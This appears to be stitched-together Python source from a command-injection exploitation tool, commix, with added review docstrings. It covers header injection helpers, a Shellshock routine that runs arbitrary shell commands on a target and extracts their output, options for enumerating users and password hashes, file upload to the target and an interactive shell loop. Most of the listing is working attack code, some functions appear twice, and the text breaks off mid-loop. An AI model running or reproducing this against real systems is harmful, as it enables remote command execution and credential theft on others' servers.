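def inject_cookie(url, vuln_parameter, payload, proxy):
  """Send one request with ``payload`` spliced into the Cookie header.

  Builds a urllib2 opener (through ``proxy`` when one is given), creates the
  request either with the user-defined POST body (``menu.options.data``) or
  with the URL trimmed by ``parameters.get_url_part``, runs the extra-header
  check, and replaces ``settings.INJECT_TAG`` inside ``menu.options.cookie``
  with the (newline-fixed) payload.

  :param url: target URL.
  :param vuln_parameter: accepted for signature parity with the sibling
    ``inject_*`` helpers; it is not read here.
  :param payload: value substituted for the inject tag; URL-quoted first when
    ``settings.TIME_RELATIVE_ATTACK`` is set.
  :param proxy: urllib2 handler for ``build_opener``, or ``None``.
  :returns: the opened response, or ``None`` when preparing/sending the
    request raised ``ValueError`` (the original best-effort contract is kept
    so callers do not see a new exception).
  """
  opener = urllib2.build_opener() if proxy is None else urllib2.build_opener(proxy)
  if settings.TIME_RELATIVE_ATTACK:
    payload = urllib.quote(payload)
  # Request body: user-defined POST data, otherwise the bare URL part.
  if menu.options.data:
    menu.options.data = settings.USER_DEFINED_POST_DATA
    request = urllib2.Request(url, menu.options.data)
  else:
    url = parameters.get_url_part(url)
    request = urllib2.Request(url)
  # Extra user-supplied headers first, then the tainted Cookie value.
  headers.do_check(request)
  payload = checks.newline_fixation(payload)
  request.add_header('Cookie', menu.options.cookie.replace(settings.INJECT_TAG, payload))
  try:
    headers.check_http_traffic(request)
    return opener.open(request)
  except ValueError:
    # Malformed header/URL: keep the silent fallback the callers rely on.
    return None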
def check_for_shell(url, cmd, cve, check_header, filename):
  """Run ``cmd`` via a Shellshock header payload and extract its output.

  The command is wrapped as ``echo <TAG>$(cmd)<TAG>`` with a random
  six-uppercase-letter TAG so its output can be cut out of the response body
  regardless of surrounding content; ``shellshock_exploitation`` turns that
  into the header value for ``cve``.

  :param url: target URL.
  :param cmd: shell command to execute on the target.
  :param cve: variant selector passed to ``shellshock_exploitation``.
  :param check_header: name of the HTTP header carrying the payload.
  :param filename: not read in this function (kept for caller parity).
  :returns: ``(shell, payload)`` -- the text found between the TAG markers
    (newlines flattened to spaces, matches joined) and the header value sent.
  :raises SystemExit: after printing a ``urllib2.URLError``.
  """
  try:
    # Random delimiter: lets the output be located inside arbitrary HTML.
    TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
    cmd = "echo " + TAG + "$(" + cmd + ")" + TAG
    payload = shellshock_exploitation(cve, cmd)
    info_msg = "Executing the '" + cmd + "' command... "
    if settings.VERBOSITY_LEVEL == 1:
      sys.stdout.write(settings.print_info_msg(info_msg))
    elif settings.VERBOSITY_LEVEL > 1:
      sys.stdout.write(settings.print_info_msg(info_msg))
      sys.stdout.flush()
    if settings.VERBOSITY_LEVEL >= 1:
      sys.stdout.write("\n" + settings.print_payload(payload)+ "\n")
    header = {check_header : payload}
    request = urllib2.Request(url, None, header)
    # menu.options.agent is overwritten with whatever User-Agent is sent --
    # presumably so log_http_headers reports the real value; confirm.
    if check_header == "User-Agent":
      menu.options.agent = payload
    else:
      menu.options.agent = default_user_agent
    log_http_headers.do_check(request)
    log_http_headers.check_http_traffic(request)
    # Check if defined any HTTP Proxy.
    if menu.options.proxy:
      response = proxy.use_proxy(request)
    # Check if defined Tor.
    elif menu.options.tor:
      response = tor.use_tor(request)
    else:
      # NOTE(review): no timeout is passed; a stalled target blocks here.
      response = urllib2.urlopen(request)
    # Flatten the body to one line, then take what lies between the TAGs.
    # (.*) is greedy: with more than one TAG pair the outermost pair wins.
    shell = response.read().rstrip().replace('\n',' ')
    shell = re.findall(r"" + TAG + "(.*)" + TAG, shell)
    shell = ''.join(shell)
    return shell, payload
  except urllib2.URLError, err_msg:
    print "\n" + settings.print_critical_msg(err_msg)
    raise SystemExit()
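def inject_user_agent(url, vuln_parameter, payload, proxy):
  """Send one request carrying ``payload`` as the User-Agent header.

  Builds a urllib2 opener (through ``proxy`` when given), creates the request
  with the user-defined POST body or the trimmed URL, applies the extra-header
  check, and sets the newline-fixed payload as ``User-Agent``.

  :param url: target URL.
  :param vuln_parameter: accepted for signature parity with the sibling
    ``inject_*`` helpers; not read here.
  :param payload: header value to send.
  :param proxy: urllib2 handler for ``build_opener``, or ``None``.
  :returns: the opened response, or ``None`` when ``ValueError`` was raised
    while checking or sending the request (original best-effort contract).
  """
  opener = urllib2.build_opener() if proxy is None else urllib2.build_opener(proxy)
  # Request body: user-defined POST data, otherwise the bare URL part.
  if menu.options.data:
    menu.options.data = settings.USER_DEFINED_POST_DATA
    request = urllib2.Request(url, menu.options.data)
  else:
    url = parameters.get_url_part(url)
    request = urllib2.Request(url)
  # Extra user-supplied headers first, then the tainted User-Agent.
  headers.do_check(request)
  payload = checks.newline_fixation(payload)
  request.add_header('User-Agent', payload)
  try:
    headers.check_http_traffic(request)
    return opener.open(request)
  except ValueError:
    # Malformed header/URL: keep the silent fallback the callers rely on.
    return None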
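def inject_host(url, vuln_parameter, payload, proxy):
  """Send one request carrying ``payload`` as the Host header.

  Builds a urllib2 opener (through ``proxy`` when given), creates the request
  with the user-defined POST body or the trimmed URL, applies the extra-header
  check, and sets the newline-fixed payload as ``Host``.

  :param url: target URL.
  :param vuln_parameter: accepted for signature parity with the sibling
    ``inject_*`` helpers; not read here.
  :param payload: header value to send.
  :param proxy: urllib2 handler for ``build_opener``, or ``None``.
  :returns: the opened response, or ``None`` when ``ValueError`` was raised
    while checking or sending the request (original best-effort contract).
  """
  opener = urllib2.build_opener() if proxy is None else urllib2.build_opener(proxy)
  # Request body: user-defined POST data, otherwise the bare URL part.
  if menu.options.data:
    menu.options.data = settings.USER_DEFINED_POST_DATA
    request = urllib2.Request(url, menu.options.data)
  else:
    url = parameters.get_url_part(url)
    request = urllib2.Request(url)
  # Extra user-supplied headers first, then the tainted Host value.
  headers.do_check(request)
  payload = checks.newline_fixation(payload)
  request.add_header('Host', payload)
  try:
    headers.check_http_traffic(request)
    return opener.open(request)
  except ValueError:
    # Malformed header/URL: keep the silent fallback the callers rely on.
    return None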
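def inject_custom_header(url, vuln_parameter, payload, proxy):
  """Send one request carrying ``payload`` in ``settings.CUSTOM_HEADER_NAME``.

  Python 3 (``_urllib``) variant: builds an opener (through ``proxy`` when
  given), encodes the user-defined POST body with ``settings.UNICODE_ENCODING``
  or uses the trimmed URL, applies the extra-header check, and sets the
  newline-fixed payload as the custom header.

  :param url: target URL.
  :param vuln_parameter: accepted for signature parity with the sibling
    ``inject_*`` helpers; not read here.
  :param payload: header value to send.
  :param proxy: urllib handler for ``build_opener``, or ``None``.
  :returns: the opened response, or ``None`` when ``ValueError`` was raised
    while checking or sending the request (original best-effort contract).
  """
  opener = _urllib.request.build_opener() if proxy is None else _urllib.request.build_opener(proxy)
  # Request body: user-defined POST data (bytes), otherwise the bare URL part.
  if menu.options.data:
    menu.options.data = settings.USER_DEFINED_POST_DATA
    request = _urllib.request.Request(url, menu.options.data.encode(settings.UNICODE_ENCODING))
  else:
    url = parameters.get_url_part(url)
    request = _urllib.request.Request(url)
  # Extra user-supplied headers first, then the tainted custom header.
  headers.do_check(request)
  payload = checks.newline_fixation(payload)
  request.add_header(settings.CUSTOM_HEADER_NAME, payload)
  try:
    headers.check_http_traffic(request)
    return opener.open(request)
  except ValueError:
    # Malformed header/URL: keep the silent fallback the callers rely on.
    return None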
def get_request_response(request):
  """Send ``request`` through the configured proxy and map HTTP errors.

  As shown in this listing the body only covers the ``menu.options.proxy``
  path: a 500 (``settings.INTERNAL_SERVER_ERROR``) yields ``response = False``,
  any other ``HTTPError`` is reported once (then suppressed when the user
  chooses to continue), and a ``URLError`` terminates the run.  No Tor/direct
  branch and no ``return`` statement are present here, so the function as
  listed yields ``None``; the listing is probably truncated -- confirm against
  the full source.

  :param request: prepared urllib2 request.
  :raises SystemExit: on ``URLError`` or when the user declines to continue.
  """
  # Header echo is skipped while a reverse/bind TCP session is in progress.
  if settings.REVERSE_TCP == False and settings.BIND_TCP == False:
    headers.check_http_traffic(request)
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, err_msg:
      if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
        response = False
      elif settings.IGNORE_ERR_MSG == False:
        err = str(err_msg) + "."
        # Blank-line bookkeeping so the error does not overwrite a progress line.
        if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
        settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
          print ""
        if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
          print ""
        print settings.print_critical_msg(err)
        # Once the user opts to continue, later HTTP errors are silenced globally.
        continue_tests = checks.continue_tests(err_msg)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      # Every HTTPError path ends with response = False.
      response = False
    except urllib2.URLError, err_msg:
      if "Connection refused" in err_msg.reason:
        err_msg = "The target host is not responding. "
        err_msg += "Please ensure that is up and try again."
      if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
      settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
        print ""
      if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
        print ""
      print settings.print_critical_msg(err_msg)
      raise SystemExit()
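def inject_custom_header(url, vuln_parameter, payload, proxy):
  """Send one request carrying the URL-decoded ``payload`` in the custom header.

  Python 2 (``urllib2``) variant: builds an opener (through ``proxy`` when
  given), creates the request with the user-defined POST body or the trimmed
  URL, applies the extra-header check, and sets ``urllib.unquote(payload)`` as
  ``settings.CUSTOM_HEADER_NAME``.

  NOTE(review): unlike the sibling ``inject_*`` helpers this variant does not
  run ``checks.newline_fixation`` on the value, and unquoting can re-introduce
  CR/LF into the header -- confirm the intended contract.

  :param url: target URL.
  :param vuln_parameter: accepted for signature parity with the sibling
    ``inject_*`` helpers; not read here.
  :param payload: percent-encoded header value; decoded before sending.
  :param proxy: urllib2 handler for ``build_opener``, or ``None``.
  :returns: the opened response, or ``None`` when ``ValueError`` was raised
    while checking or sending the request (original best-effort contract).
  """
  opener = urllib2.build_opener() if proxy is None else urllib2.build_opener(proxy)
  # Request body: user-defined POST data, otherwise the bare URL part.
  if menu.options.data:
    menu.options.data = settings.USER_DEFINED_POST_DATA
    request = urllib2.Request(url, menu.options.data)
  else:
    url = parameters.get_url_part(url)
    request = urllib2.Request(url)
  # Extra user-supplied headers first, then the decoded custom header.
  headers.do_check(request)
  request.add_header(settings.CUSTOM_HEADER_NAME, urllib.unquote(payload))
  try:
    headers.check_http_traffic(request)
    return opener.open(request)
  except ValueError:
    # Malformed header/URL: keep the silent fallback the callers rely on.
    return None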
def get_request_response(request):
  """Send ``request`` through the configured proxy and map HTTP errors.

  As shown in this listing the body only covers the ``menu.options.proxy``
  path: a 500 (``settings.INTERNAL_SERVER_ERROR``) yields ``response = False``,
  any other ``HTTPError`` is reported once (then suppressed when the user
  chooses to continue), and a ``URLError`` terminates the run.  No Tor/direct
  branch and no ``return`` statement are present here, so the function as
  listed yields ``None``; the listing is probably truncated -- confirm against
  the full source.

  :param request: prepared urllib2 request.
  :raises SystemExit: on ``URLError`` or when the user declines to continue.
  """
  # Header echo is skipped while a reverse/bind TCP session is in progress.
  if settings.REVERSE_TCP == False and settings.BIND_TCP == False:
    headers.check_http_traffic(request)
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, err_msg:
      if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
        response = False
      elif settings.IGNORE_ERR_MSG == False:
        err = str(err_msg) + "."
        # Blank-line bookkeeping so the error does not overwrite a progress line.
        if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
        settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
          print ""
        if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
          print ""
        print settings.print_critical_msg(err)
        # Once the user opts to continue, later HTTP errors are silenced globally.
        continue_tests = checks.continue_tests(err_msg)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      # Every HTTPError path ends with response = False.
      response = False
    except urllib2.URLError, err_msg:
      if "Connection refused" in err_msg.reason:
        err_msg = "The target host is not responding. "
        err_msg += "Please ensure that is up and try again."
      if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
      settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
        print ""
      if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
        print ""
      print settings.print_critical_msg(err_msg)
      raise SystemExit()
def main():
  """CLI entry point: validate options, then probe the target URL.

  Order of work as listed: one-shot options (``--version``, dependencies,
  ``--update``, ``--install``), option range checks (verbosity, level,
  technique letters, alternative shell, file-write/upload destination),
  then for ``--url``: crawl, pick the output directory, create the log file,
  build the initial request, run the proxy/Tor checks and make the
  connectivity request.  With ``--file-upload`` pointing at a local file the
  user is offered the built-in HTTP server.

  NOTE(review): this listing stops inside the ``if menu.options.file_upload``
  block; the ``except`` clauses for the two enclosing ``try`` blocks are not
  shown here, so the error handling at this level cannot be documented.
  """
  try:
    # Check if defined "--version" option.
    if menu.options.version:
      version.show_version()
      sys.exit(0)
    # Checkall the banner
    menu.banner()
    # Check python version number.
    version.python_version()
    # Check if defined "--dependencies" option.
    # For checking (non-core) third party dependenices.
    if menu.options.noncore_dependencies:
      checks.third_party_dependencies()
      sys.exit(0)
    # Check if defined "--update" option.
    if menu.options.update:
      update.updater()
    # Check if defined "--install" option.
    if menu.options.install:
      install.installer()
      sys.exit(0)
    # Check arguments
    if len(sys.argv) == 1:
      menu.parser.print_help()
      print ""
      sys.exit(0)
    # Define the level of verbosity.
    if menu.options.verbose > 4:
      err_msg = "The value for option '-v' "
      err_msg += "must be an integer value from range [0, 4]."
      print settings.print_critical_msg(err_msg)
      sys.exit(0)
    else:
      settings.VERBOSITY_LEVEL = menu.options.verbose
    # Check if defined "--delay" option.
    # NOTE(review): compares against the string "0"; in Python 2 an int always
    # orders below a str, so this never fires if delay is an int -- confirm type.
    if menu.options.delay > "0":
      settings.DELAY = menu.options.delay
    # Define the level of tests to perform.
    if menu.options.level > 3:
      err_msg = "The value for option '--level' "
      err_msg += "must be an integer value from range [1, 3]."
      print settings.print_critical_msg(err_msg)
      sys.exit(0)
    # Define the local path where Metasploit Framework is installed.
    if menu.options.msf_path:
      settings.METASPLOIT_PATH = menu.options.msf_path
    # Parse target / data from HTTP proxy logs (i.e Burp / WebScarab).
    if menu.options.logfile:
      parser.logfile_parser()
    # Ignore the mathematic calculation part (Detection phase).
    if menu.options.skip_calc:
      settings.SKIP_CALC = True
    # Target URL reload.
    if menu.options.url_reload and menu.options.data:
      settings.URL_RELOAD = True
    # Check provided parameters for tests
    if menu.options.test_parameter:
      if menu.options.test_parameter.startswith("="):
        menu.options.test_parameter = menu.options.test_parameter[1:]
      settings.TEST_PARAMETER = menu.options.test_parameter.split(settings.PARAMETER_SPLITTING_REGEX)
      # Keep only the name part of any "name=value" entries.
      for i in range(0, len(settings.TEST_PARAMETER)):
        if "=" in settings.TEST_PARAMETER[i]:
          settings.TEST_PARAMETER[i] = settings.TEST_PARAMETER[i].split("=")[0]
    # Check if ".git" exists and check for updated version!
    if os.path.isdir("./.git") and settings.CHECK_FOR_UPDATES_ON_START:
      update.check_for_update()
    # Check if defined character used for splitting parameter values.
    if menu.options.pdel:
      settings.PARAMETER_DELIMITER = menu.options.pdel
    # Check if defined character used for splitting cookie values.
    if menu.options.cdel:
      settings.COOKIE_DELIMITER = menu.options.cdel
    # Check if specified wrong injection technique
    if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES:
      found_tech = False
      # Convert injection technique(s) to lowercase
      menu.options.tech = menu.options.tech.lower()
      # Check if used the ',' separator
      if settings.PARAMETER_SPLITTING_REGEX in menu.options.tech:
        split_techniques_names = menu.options.tech.split(settings.PARAMETER_SPLITTING_REGEX)
      else:
        split_techniques_names = menu.options.tech.split()
      if split_techniques_names:
        for i in range(0, len(split_techniques_names)):
          # Short values (<= 4 chars) are also accepted as a run of single letters;
          # found_tech ends up reflecting only the LAST letter checked.
          if len(menu.options.tech) <= 4:
            split_first_letter = list(menu.options.tech)
            for j in range(0, len(split_first_letter)):
              if split_first_letter[j] in settings.AVAILABLE_TECHNIQUES:
                found_tech = True
              else:
                found_tech = False
          if split_techniques_names[i].replace(' ', '') not in settings.AVAILABLE_TECHNIQUES and \
          found_tech == False:
            err_msg = "You specified wrong value '" + split_techniques_names[i]
            err_msg += "' as injection technique. "
            err_msg += "The value, must be a string composed by the letters (C)lassic, (E)val-based, "
            err_msg += "(T)ime-based, (F)ile-based (with or without commas)."
            print settings.print_critical_msg(err_msg)
            sys.exit(0)
    # Check if specified wrong alternative shell
    if menu.options.alter_shell:
      if menu.options.alter_shell.lower() not in settings.AVAILABLE_SHELLS:
        err_msg = "'" + menu.options.alter_shell + "' shell is not supported!"
        print settings.print_critical_msg(err_msg)
        sys.exit(0)
    # Check the file-destination
    if menu.options.file_write and not menu.options.file_dest or \
    menu.options.file_upload and not menu.options.file_dest:
      err_msg = "Host's absolute filepath to write and/or upload, must be specified (--file-dest)."
      print settings.print_critical_msg(err_msg)
      sys.exit(0)
    if menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None:
      err_msg = "You must enter the '--file-write' or '--file-upload' parameter."
      print settings.print_critical_msg(err_msg)
      sys.exit(0)
    # Check if defined "--random-agent" option.
    if menu.options.random_agent:
      menu.options.agent = random.choice(settings.USER_AGENT_LIST)
    # Check if defined "--url" option.
    if menu.options.url:
      url = menu.options.url
      # Check if http / https
      url = checks.check_http_s(url)
      # Load the crawler
      if menu.options.crawldepth > 0:
        menu.options.DEFAULT_CRAWLDEPTH_LEVEL = menu.options.crawldepth
        url = crawler.crawler(url)
      if menu.options.output_dir:
        output_dir = menu.options.output_dir
      else:
        output_dir = settings.OUTPUT_DIR
      # One directory up, if Windows or if the script is being run under "/src".
      if settings.IS_WINDOWS or "/src" in os.path.dirname(os.path.abspath(__file__)):
        os.chdir("..")
        output_dir = os.path.dirname(output_dir)
      # NOTE(review): bare except -- any stat() failure (not only "missing")
      # leads to mkdir, whose own errors propagate.
      try:
        os.stat(output_dir)
      except:
        os.mkdir(output_dir)
      # The logs filename construction.
      filename = logs.create_log_file(url, output_dir)
      try:
        # Check if defined POST data
        if menu.options.data:
          request = urllib2.Request(url, menu.options.data)
        else:
          request = urllib2.Request(url)
        headers.do_check(request)
        #headers.check_http_traffic(request)
        # Check if defined any HTTP Proxy (--proxy option).
        if menu.options.proxy:
          proxy.do_check(url)
        # Check if defined Tor (--tor option).
        elif menu.options.tor:
          tor.do_check()
        if menu.options.flush_session:
          session_handler.flush(url)
        info_msg = "Checking connection to the target URL... "
        sys.stdout.write(settings.print_info_msg(info_msg))
        sys.stdout.flush()
        if settings.VERBOSITY_LEVEL >= 2:
          print ""
        headers.check_http_traffic(request)
        try:
          # Check if defined any HTTP Proxy (--proxy option).
          if menu.options.proxy:
            response = proxy.use_proxy(request)
          # Check if defined Tor (--tor option).
          elif menu.options.tor:
            response = tor.use_tor(request)
          else:
            try:
              response = urllib2.urlopen(request)
            except ValueError:
              # Invalid format for the '--headers' option.
              if settings.VERBOSITY_LEVEL < 2:
                print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]"
              err_msg = "Use '--headers=\"HEADER_NAME:HEADER_VALUE\"' "
              err_msg += "to provide an HTTP header or"
              err_msg += " '--headers=\"HEADER_NAME:" + settings.WILDCARD_CHAR + "\"' "
              err_msg += "if you want to try to exploit the provided HTTP header."
              print settings.print_critical_msg(err_msg)
              sys.exit(0)
        except urllib2.HTTPError, e:
          if settings.VERBOSITY_LEVEL < 2:
            print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]"
          err_msg = str(e).replace(": ", " (") + ")."
          print settings.print_critical_msg(err_msg)
          raise SystemExit
        # Body is read once; neither name is used again in the visible listing.
        html_data = content = response.read()
        if settings.VERBOSITY_LEVEL < 2:
          print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]"
        # Check for CGI scripts on url
        checks.check_CGI_scripts(url)
        # Modification on payload
        if not menu.options.shellshock:
          #settings.CURRENT_USER = "******" + settings.CURRENT_USER + ")"
          settings.SYS_USERS = "echo $(" + settings.SYS_USERS + ")"
          settings.SYS_PASSES = "echo $(" + settings.SYS_PASSES + ")"
        # Check if defined "--file-upload" option.
        if menu.options.file_upload:
          if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload):
            # Check if not defined URL for upload.
            while True:
              question_msg = "Do you want to enable an HTTP server? [Y/n/q] > "
              sys.stdout.write(settings.print_question_msg(question_msg))
              enable_HTTP_server = sys.stdin.readline().replace("\n", "").lower()
              if len(enable_HTTP_server) == 0:
                enable_HTTP_server = "y"
              if enable_HTTP_server in settings.CHOICE_YES:
                # Check if file exists
                if not os.path.isfile(menu.options.file_upload):
                  err_msg = "The '" + menu.options.file_upload + "' file, does not exists."
                  sys.stdout.write(settings.print_critical_msg(err_msg) + "\n")
                  sys.exit(0)
                http_server = "http://" + str(settings.LOCAL_HTTP_IP) + ":" + str(settings.LOCAL_HTTP_PORT) + "/"
                info_msg = "Setting the HTTP server on '" + http_server + "'. "
                print settings.print_info_msg(info_msg)
                # The local path is rewritten to the URL it will be served under.
                menu.options.file_upload = http_server + menu.options.file_upload
                simple_http_server.main()
                break
              elif enable_HTTP_server in settings.CHOICE_NO:
                if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload):
                  err_msg = "The '" + menu.options.file_upload + "' is not a valid URL. "
                  print settings.print_critical_msg(err_msg)
                  sys.exit(0)
                break
              elif enable_HTTP_server in settings.CHOICE_QUIT:
                sys.exit(0)
              else:
                err_msg = "'" + enable_HTTP_server + "' is not a valid answer."
                print settings.print_error_msg(err_msg)
                pass
          # Verify the upload URL is reachable before the injection phase.
          try:
            urllib2.urlopen(menu.options.file_upload)
          except urllib2.HTTPError, err_msg:
            print settings.print_critical_msg(err_msg)
            sys.exit(0)
          except urllib2.URLError, err_msg:
            print settings.print_critical_msg(err_msg)
            sys.exit(0)
def examine_request(request):
  """Send ``request`` once (proxy, Tor or direct) and return the response.

  Direct sends map common failures to a printed message plus ``SystemExit``:
  connection resets, a malformed ``--header`` value (``ValueError``) and any
  other exception; an HTTP 401 is tolerated with ``--ignore-401`` and reported
  as bad credentials when an auth pair was supplied.  ``HTTPError`` from any
  path aborts the run, except in ``--bulkfile`` mode where the URL is skipped
  and ``False`` is returned.

  NOTE(review): indentation was reconstructed from a collapsed listing; the
  ``else`` that builds ``error_msg`` is paired here with the "Unauthorized"
  test, and the ``HTTPError`` handler with the outer ``try`` -- confirm.

  :param request: prepared urllib2 request.
  :returns: the opened response, or ``False`` for a skipped bulk URL.
  :raises SystemExit: on the failure paths described above.
  """
  try:
    headers.check_http_traffic(request)
    # Check if defined any HTTP Proxy (--proxy option).
    if menu.options.proxy:
      return proxy.use_proxy(request)
    # Check if defined Tor (--tor option).
    elif menu.options.tor:
      return tor.use_tor(request)
    else:
      try:
        return urllib2.urlopen(request)
      except SocketError as e:
        if e.errno == errno.ECONNRESET:
          error_msg = "Connection reset by peer."
          print settings.print_critical_msg(error_msg)
        # NOTE(review): errno.WSAECONNRESET exists only on Windows; elsewhere
        # reaching this elif raises AttributeError -- confirm.
        elif e.errno == errno.WSAECONNRESET:
          error_msg = "An existing connection was forcibly closed by the remote host."
          print settings.print_critical_msg(error_msg)
        raise SystemExit()
      except ValueError:
        # Invalid format for the '--header' option.
        if settings.VERBOSITY_LEVEL < 2:
          print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]"
        err_msg = "Use '--header=\"HEADER_NAME: HEADER_VALUE\"'"
        err_msg += "to provide an extra HTTP header or"
        err_msg += " '--header=\"HEADER_NAME: " + settings.WILDCARD_CHAR + "\"' "
        err_msg += "if you want to try to exploit the provided HTTP header."
        print settings.print_critical_msg(err_msg)
        raise SystemExit()
      except Exception as err_msg:
        if "Unauthorized" in str(err_msg):
          if menu.options.ignore_401:
            # Tolerated: falls through and the function returns None.
            pass
          elif menu.options.auth_type and menu.options.auth_cred:
            err_msg = "The provided pair of " + menu.options.auth_type
            err_msg += " HTTP authentication credentials '" + menu.options.auth_cred + "'"
            err_msg += " seems to be invalid."
            print settings.print_critical_msg(err_msg)
            raise SystemExit()
        else:
          # Prefer the text after "[Errno N] " when present, else the full message.
          try:
            error_msg = str(err_msg.args[0]).split("] ")[1] + "."
          except IndexError:
            error_msg = str(err_msg).replace(": ", " (") + ")."
          print settings.print_critical_msg(error_msg)
          raise SystemExit()
  except urllib2.HTTPError, err_msg:
    error_description = ""
    if len(str(err_msg).split(": ")[1]) == 0:
      error_description = "Non-standard HTTP status code"
    err_msg = str(err_msg).replace(": ", " (") + error_description + ")."
    if menu.options.bulkfile:
      warn_msg = "Skipping URL '" + url + "' - " + err_msg
      print settings.print_warning_msg(warn_msg)
      if settings.EOF:
        print ""
      return False
    else:
      print settings.print_critical_msg(err_msg)
      raise SystemExit
def shellshock_handler(url, http_request_method, filename):
  """Detect Shellshock via HTTP headers, then drive post-exploitation (py3 variant).

  For every ``(cve, header)`` pair a marker payload (``echo <cve>:Done;``) is
  sent; the header is considered injectable when ``cve`` shows up in the
  response headers.  On a hit the finding is logged, enumeration / file access
  are offered (or re-offered), ``--os-cmd`` is executed once, or an
  interactive pseudo-terminal loop is started.

  NOTE(review): ``print("\\n") + Fore.GREEN ...`` and
  ``print("\\n") + settings.print_critical_msg(err)`` add a str to ``None``
  (``print`` returns ``None`` in Python 3) and raise ``TypeError`` on those
  paths; the pseudo-terminal loop catches ``TypeError`` with ``break``, the
  other two sites do not.

  :param url: target URL.
  :param http_request_method: recorded in the log via ``logs.add_parameter``.
  :param filename: log file path.
  :returns: ``False``/``True`` (no result / result) when the user declines the
    pseudo-terminal and no further attack vector follows; otherwise ``None``.
  :raises SystemExit: on quit choices, ``--os-cmd`` completion, all headers
    failing, unrecoverable HTTP/URL errors or an incomplete read.
  """
  counter = 1
  vp_flag = True
  no_result = True
  export_injection_info = False
  injection_type = "results-based command injection"
  technique = "shellshock injection technique"
  info_msg = "Testing the " + technique + ". "
  if settings.VERBOSITY_LEVEL >= 2:
    info_msg = info_msg + "\n"
  sys.stdout.write(settings.print_info_msg(info_msg))
  sys.stdout.flush()
  try:
    i = 0
    total = len(shellshock_cves) * len(headers)
    for cve in shellshock_cves:
      for check_header in headers:
        # Check injection state
        settings.DETECTION_PHASE = True
        settings.EXPLOITATION_PHASE = False
        i = i + 1
        attack_vector = "echo " + cve + ":Done;"
        payload = shellshock_payloads(cve, attack_vector)
        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL == 1:
          sys.stdout.write("\n" + settings.print_payload(payload))
        elif settings.VERBOSITY_LEVEL >= 2:
          debug_msg = "Generating payload for the injection."
          print(settings.print_debug_msg(debug_msg))
          print(settings.print_payload(payload))
        header = {check_header : payload}
        request = _urllib.request.Request(url, None, header)
        # menu.options.agent mirrors the User-Agent actually sent.
        if check_header == "User-Agent":
          menu.options.agent = payload
        else:
          menu.options.agent = default_user_agent
        log_http_headers.do_check(request)
        log_http_headers.check_http_traffic(request)
        # Check if defined any HTTP Proxy.
        if menu.options.proxy:
          response = proxy.use_proxy(request)
        # Check if defined Tor.
        elif menu.options.tor:
          response = tor.use_tor(request)
        else:
          response = _urllib.request.urlopen(request, timeout=settings.TIMEOUT)
        # Progress: percent is overwritten with a status string on the last
        # attempt or on a hit; only the plain form is shown with verbosity 0.
        percent = ((i*100)/total)
        float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))
        if str(float_percent) == "100.0":
          if no_result == True:
            percent = settings.FAIL_STATUS
          else:
            percent = settings.info_msg
            no_result = False
        elif len(response.info()) > 0 and cve in response.info():
          percent = settings.info_msg
          no_result = False
        else:
          percent = str(float_percent)+ "%"
        if settings.VERBOSITY_LEVEL == 0:
          info_msg = "Testing the " + technique + "." + "" + percent + ""
          sys.stdout.write("\r" + settings.print_info_msg(info_msg))
          sys.stdout.flush()
        if no_result == False:
          # Check injection state
          settings.DETECTION_PHASE = False
          settings.EXPLOITATION_PHASE = True
          # Print the findings to log file.
          if export_injection_info == False:
            export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
          vuln_parameter = "HTTP Header"
          the_type = " " + vuln_parameter
          # Leading space is added only for the log entry and stripped right after.
          check_header = " " + check_header
          vp_flag = logs.add_parameter(vp_flag, filename, the_type, check_header, http_request_method, vuln_parameter, payload)
          check_header = check_header[1:]
          logs.update_payload(filename, counter, payload)
          if settings.VERBOSITY_LEVEL != 0:
            checks.total_of_requests()
          info_msg = "The (" + check_header + ") '"
          info_msg += url + Style.RESET_ALL + Style.BRIGHT
          info_msg += "' seems vulnerable via " + technique + "."
          if settings.VERBOSITY_LEVEL < 2:
            print("")
          print(settings.print_bold_info_msg(info_msg))
          sub_content = "\"" + payload + "\""
          print(settings.print_sub_content(sub_content))
          # Enumeration options.
          if settings.ENUMERATION_DONE == True :
            if settings.VERBOSITY_LEVEL != 0:
              print("")
            while True:
              if not menu.options.batch:
                question_msg = "Do you want to enumerate again? [Y/n] > "
                enumerate_again = _input(settings.print_question_msg(question_msg))
              else:
                enumerate_again = ""
              if len(enumerate_again) == 0:
                enumerate_again = "Y"
              if enumerate_again in settings.CHOICE_YES:
                enumeration(url, cve, check_header, filename)
                break
              elif enumerate_again in settings.CHOICE_NO:
                break
              elif enumerate_again in settings.CHOICE_QUIT:
                raise SystemExit()
              else:
